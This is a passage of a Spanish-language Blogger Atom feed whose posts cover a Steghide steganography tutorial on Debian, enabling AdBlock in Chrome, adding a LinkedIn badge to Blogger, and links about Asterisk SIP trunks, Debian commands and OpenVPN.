/&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-4746417799290076477?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/WkdI81AV-RKz7x9sDHr42rE3HG4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/WkdI81AV-RKz7x9sDHr42rE3HG4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/WkdI81AV-RKz7x9sDHr42rE3HG4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/WkdI81AV-RKz7x9sDHr42rE3HG4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/xocSmbl1Bo4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/4746417799290076477/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=4746417799290076477" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/4746417799290076477?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/4746417799290076477?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/xocSmbl1Bo4/instalando-centos-54-netinstall.html" title="Instalando CentOS-5.4 netinstall remotamente (VNC)" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-24pNVgzNLlU/Ty6ofA27ORI/AAAAAAAAA78/oKiDk4R_kFA/s72-c/01.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2012/02/instalando-centos-54-netinstall.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkIEQ304eCp7ImA9WhRbFEs.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-6534645573117435622</id><published>2012-01-20T12:30:00.000-08:00</published><updated>2012-02-05T11:01:42.330-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-02-05T11:01:42.330-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Linux" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad" /><title>Steghide - Esteganografia en debian Squeeze</title><content type="html">&lt;span style="font-weight:bold;"&gt;Steghide:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;El man lo describe como un programa de esteganografia. &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;La esteganografia:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Es una tecnica que permite ocultar información dentro de otro tipo de datos, como ser imágenes o audio.&lt;br /&gt;&lt;br /&gt;En este ejemplo ocultaremos un archivo de texto en una imagen JPG.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Instalamos steghide en debian:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@PruebasIT:~# apt-get install steghide&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Lo ejecutamos y vemos que al final nos muestra los parámetros mas comunes:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@PruebasIT:~# steghide&lt;br /&gt;To embed emb.txt in cvr.jpg: steghide embed -cf cvr.jpg -ef emb.txt&lt;br /&gt;To extract embedded data from stg.jpg: steghide extract -sf stg.jpg&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Editamos un archivo de texto y escribimos algo dentro:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@PruebasIT:~# vim ocultar.txt&lt;br /&gt; Esto esta oculto&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Ocultamos el file "ocultar.txt" dentro de image.jpg:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@PruebasIT:~# steghide embed -cf image.jpg -ef ocultar.txt&lt;br /&gt;Enter passphrase:&lt;br /&gt;Re-Enter passphrase:&lt;br /&gt;embedding "ocultar.txt" in "image.jpg"... done&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Eliminamos el archivo original:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@PruebasIT:~# rm -rf ocultar.txt&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Verificamos que no esta:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@PruebasIT:~# ls image.txt&lt;br /&gt;ls: cannot access image.txt: No such file or directory&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Extraemos el archivo de texto oculto de la imagen:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@PruebasIT:~# steghide extract -sf image.jpg&lt;br /&gt;Enter passphrase:&lt;br /&gt;wrote extracted data to "ocultar.txt".&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Verificamos que el contenido es el mismo que el que borramos:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@PruebasIT:~# cat ocultar.txt&lt;br /&gt;esto esta oculto&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-6534645573117435622?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/DSyUBcgKGLFM9fMZeTG0brLRPlY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/DSyUBcgKGLFM9fMZeTG0brLRPlY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/DSyUBcgKGLFM9fMZeTG0brLRPlY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/DSyUBcgKGLFM9fMZeTG0brLRPlY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/CJF5gbeYBMA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/6534645573117435622/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=6534645573117435622" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/6534645573117435622?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/6534645573117435622?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/CJF5gbeYBMA/steghide-esteganografia-en-debian.html" title="Steghide - Esteganografia en debian Squeeze" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2012/01/steghide-esteganografia-en-debian.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEUFQXc8eCp7ImA9WhRVGEk.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-1959530713040479077</id><published>2012-01-17T14:56:00.000-08:00</published><updated>2012-01-17T15:16:50.970-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-17T15:16:50.970-08:00</app:edited><title>Eliminar Publicidad en Chrome</title><content type="html">Odias esto?&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-jHRtP4vxAJ4/TxX831sqPKI/AAAAAAAAA6Q/YvfC6D08MaM/s1600/01.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="http://1.bp.blogspot.com/-jHRtP4vxAJ4/TxX831sqPKI/AAAAAAAAA6Q/YvfC6D08MaM/s320/01.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5698738939744631970" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Usá: &lt;a href="https://chrome.google.com/webstore/detail/gighmmpiobklfepjocnamgkkbiglidom"&gt;AdBlock&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Lo añadimos al Chrome:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-709TkANTjCc/TxX9iSsDU3I/AAAAAAAAA6c/tpbpD7mOajQ/s1600/02.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 174px;" src="http://4.bp.blogspot.com/-709TkANTjCc/TxX9iSsDU3I/AAAAAAAAA6c/tpbpD7mOajQ/s320/02.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5698739669081215858" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Instalamos:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-zzwCIHAxo_w/TxX96Ph5-lI/AAAAAAAAA6o/E4QzUubCccA/s1600/03.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 140px;" src="http://1.bp.blogspot.com/-zzwCIHAxo_w/TxX96Ph5-lI/AAAAAAAAA6o/E4QzUubCccA/s320/03.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5698740080550214226" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Verificamos que no aparece la publicidad en mi blog:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-Khnr1LO4Zf8/TxX_c8Un4fI/AAAAAAAAA7A/otMG1iX0tD4/s1600/05.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 169px;" src="http://2.bp.blogspot.com/-Khnr1LO4Zf8/TxX_c8Un4fI/AAAAAAAAA7A/otMG1iX0tD4/s320/05.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5698741776201277938" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Indicamos que no queremos que oculte publicidad en este dominio:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-8buCFuN4c8w/TxYAN5p1pAI/AAAAAAAAA7M/3xtlPENW7_U/s1600/06.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 311px; height: 295px;" src="http://1.bp.blogspot.com/-8buCFuN4c8w/TxYAN5p1pAI/AAAAAAAAA7M/3xtlPENW7_U/s320/06.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5698742617298543618" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Excluimos:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-D_VQjjKWKmQ/TxYAODoiYsI/AAAAAAAAA7U/jh5nLM28I38/s1600/07.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 111px;" src="http://3.bp.blogspot.com/-D_VQjjKWKmQ/TxYAODoiYsI/AAAAAAAAA7U/jh5nLM28I38/s320/07.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5698742619977441986" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Volvemos a ver la Publicidad en nuestro site:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-RhbcGkpeVMQ/TxYBOgXetTI/AAAAAAAAA7k/WPkwUcbrxcQ/s1600/08.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 167px;" src="http://1.bp.blogspot.com/-RhbcGkpeVMQ/TxYBOgXetTI/AAAAAAAAA7k/WPkwUcbrxcQ/s320/08.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5698743727202153778" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-1959530713040479077?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/pX2na9zsBxets5YFXBZIqTROSSY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/pX2na9zsBxets5YFXBZIqTROSSY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/pX2na9zsBxets5YFXBZIqTROSSY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/pX2na9zsBxets5YFXBZIqTROSSY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/HzZ_zLGxNkw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/1959530713040479077/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=1959530713040479077" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/1959530713040479077?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/1959530713040479077?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/HzZ_zLGxNkw/eliminar-publicidad-en-chrome.html" title="Eliminar Publicidad en Chrome" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-jHRtP4vxAJ4/TxX831sqPKI/AAAAAAAAA6Q/YvfC6D08MaM/s72-c/01.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2012/01/eliminar-publicidad-en-chrome.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A04NSX4yeip7ImA9WhRVGE4.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-4139003480582969968</id><published>2012-01-17T14:13:00.000-08:00</published><updated>2012-01-17T14:39:58.092-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-17T14:39:58.092-08:00</app:edited><title>LinkedIn en Blogger</title><content type="html">Hacemos click en Diseño y Elementos de página como muestra la figura:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-My34jCIReL0/TxXzXnFrBFI/AAAAAAAAA5I/55F0i5gQ3rY/s1600/01.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 98px;" src="http://1.bp.blogspot.com/-My34jCIReL0/TxXzXnFrBFI/AAAAAAAAA5I/55F0i5gQ3rY/s320/01.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5698728490462544978" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Luego en Añadir gadget:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-KBcmgWOvOmk/TxXzuQ4Ji3I/AAAAAAAAA5U/qa52c4sx54Y/s1600/02.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 101px;" src="http://2.bp.blogspot.com/-KBcmgWOvOmk/TxXzuQ4Ji3I/AAAAAAAAA5U/qa52c4sx54Y/s320/02.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5698728879637236594" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Elegimos el HTML/Javascript:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-9FKtiQNS1Kw/TxX0PUYU8EI/AAAAAAAAA5g/SrrCkfK6qrk/s1600/03.GIF"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 269px;" src="http://1.bp.blogspot.com/-9FKtiQNS1Kw/TxX0PUYU8EI/AAAAAAAAA5g/SrrCkfK6qrk/s320/03.GIF" border="0" alt=""id="BLOGGER_PHOTO_ID_5698729447513190466" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;En título ponemos nuestro nombre y en Contenido lo siguiente, tener en cuenta que no agregué los &lt; para que se pueda ver el código, en la imagen está exactamente lo que debemos agregar:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;a href="http://www.linkedin.com/pub/hernan-tirado/23/a36/547" img src="http://www.linkedin.com/img/webpromo/btn_myprofile_160x33.gif" width="160" height="33" border="0" alt="Ver mi Perfil en LinkedIn" /&gt;/a&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-LPmYxP3j7no/TxX1iUnlgPI/AAAAAAAAA5s/OYq6RFlinLI/s1600/04.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 295px;" src="http://2.bp.blogspot.com/-LPmYxP3j7no/TxX1iUnlgPI/AAAAAAAAA5s/OYq6RFlinLI/s320/04.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5698730873506332914" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Finalmente volvemos a Guardar:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-W2iuEFTHJW8/TxX2BZNW_0I/AAAAAAAAA54/YRHdhkclghc/s1600/05.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 129px;" src="http://3.bp.blogspot.com/-W2iuEFTHJW8/TxX2BZNW_0I/AAAAAAAAA54/YRHdhkclghc/s320/05.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5698731407314452290" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Nota:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; http://www.linkedin.com/pub/hernan-tirado/23/a36/547 &lt;span style="font-weight:bold;"&gt;representa el link de mi perfil&lt;/span&gt;&lt;br /&gt; http://www.linkedin.com/img/webpromo/btn_myprofile_160x33.gif &lt;span style="font-weight:bold;"&gt;representa la imagen que quiero mostrar&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Resultado final:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-BhlBLoKy13U/TxX3YX-8klI/AAAAAAAAA6E/8vi7SuxUrJ4/s1600/06.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 151px;" src="http://1.bp.blogspot.com/-BhlBLoKy13U/TxX3YX-8klI/AAAAAAAAA6E/8vi7SuxUrJ4/s320/06.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5698732901634183762" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Ver otros íconos:&lt;/span&gt; &lt;a href="http://www.linkedin.com/profile?promoteProfile"&gt;http://www.linkedin.com/profile?promoteProfile&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-4139003480582969968?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/23ml3xNTxYT6oSOYy0ekdbl5Kw0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/23ml3xNTxYT6oSOYy0ekdbl5Kw0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/23ml3xNTxYT6oSOYy0ekdbl5Kw0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/23ml3xNTxYT6oSOYy0ekdbl5Kw0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/3jhwmmZF0IA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/4139003480582969968/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=4139003480582969968" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/4139003480582969968?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/4139003480582969968?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/3jhwmmZF0IA/agregar-perfil-de-linkedin-blogger.html" title="LinkedIn en Blogger" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-My34jCIReL0/TxXzXnFrBFI/AAAAAAAAA5I/55F0i5gQ3rY/s72-c/01.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2012/01/agregar-perfil-de-linkedin-blogger.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0QFQHczcSp7ImA9WhRVFUw.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-6060082333269461574</id><published>2012-01-13T19:21:00.000-08:00</published><updated>2012-01-13T19:21:51.989-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-13T19:21:51.989-08:00</app:edited><title>La Legion de Yoda: Trunk SIP entre 2 Asterisk</title><content type="html">&lt;a href="http://it-yoda.blogspot.com/2011/04/trunk-sip-entre-2-asterisk.html?spref=bl"&gt;La Legion de Yoda: Trunk SIP entre 2 Asterisk&lt;/a&gt;: Es Tutorial muestra como hacer un trunk SIP entre 2 Asterisk. La Sede A tiene los internos 80xx y la Sede B los internos 10xx. Para que la S...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-6060082333269461574?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/k3-34z2U-_HYfRuN8kV1pUDCHQs/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/k3-34z2U-_HYfRuN8kV1pUDCHQs/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/k3-34z2U-_HYfRuN8kV1pUDCHQs/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/k3-34z2U-_HYfRuN8kV1pUDCHQs/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/onPJl0WvK68" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/6060082333269461574/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=6060082333269461574" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/6060082333269461574?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/6060082333269461574?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/onPJl0WvK68/la-legion-de-yoda-trunk-sip-entre-2.html" title="La Legion de Yoda: Trunk SIP entre 2 Asterisk" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2012/01/la-legion-de-yoda-trunk-sip-entre-2.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0IBQHc9cCp7ImA9WhRWE04.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-3455543302842185210</id><published>2011-12-31T05:46:00.000-08:00</published><updated>2011-12-31T05:52:31.968-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-31T05:52:31.968-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Linux" /><title>Comandos Linux Debian</title><content type="html">&lt;span style="font-weight:bold;"&gt;Cubo debian:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sinwindows.files.wordpress.com/2011/03/debian.png"&gt;http://sinwindows.files.wordpress.com/2011/03/debian.png&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Recopilación de comandos de esdebian:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.esdebian.org/wiki/lista-comandos-gnulinux-i"&gt;http://www.esdebian.org/wiki/lista-comandos-gnulinux-i&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.esdebian.org/wiki/lista-comandos-gnulinux-ii"&gt;http://www.esdebian.org/wiki/lista-comandos-gnulinux-ii&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.esdebian.org/wiki/lista-comandos-gnulinux-iii"&gt;http://www.esdebian.org/wiki/lista-comandos-gnulinux-iii&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-3455543302842185210?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Db55ZUYcRo50Uxpn2Bup6Uebql8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Db55ZUYcRo50Uxpn2Bup6Uebql8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Db55ZUYcRo50Uxpn2Bup6Uebql8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Db55ZUYcRo50Uxpn2Bup6Uebql8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/tc1w-SWsxCM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/3455543302842185210/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=3455543302842185210" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/3455543302842185210?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/3455543302842185210?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/tc1w-SWsxCM/comandos-linux-debian.html" title="Comandos Linux Debian" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/comandos-linux-debian.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEIDQnk5eSp7ImA9WhRWFU8.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-1569722953183406076</id><published>2011-12-30T21:17:00.000-08:00</published><updated>2012-01-02T08:42:53.721-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-02T08:42:53.721-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Linux" /><title>OpenVPN en debian Squeeze</title><content type="html">&lt;span style="font-weight:bold;"&gt;Qué es OpenVPN?&lt;/span&gt;&lt;br /&gt;&lt;br 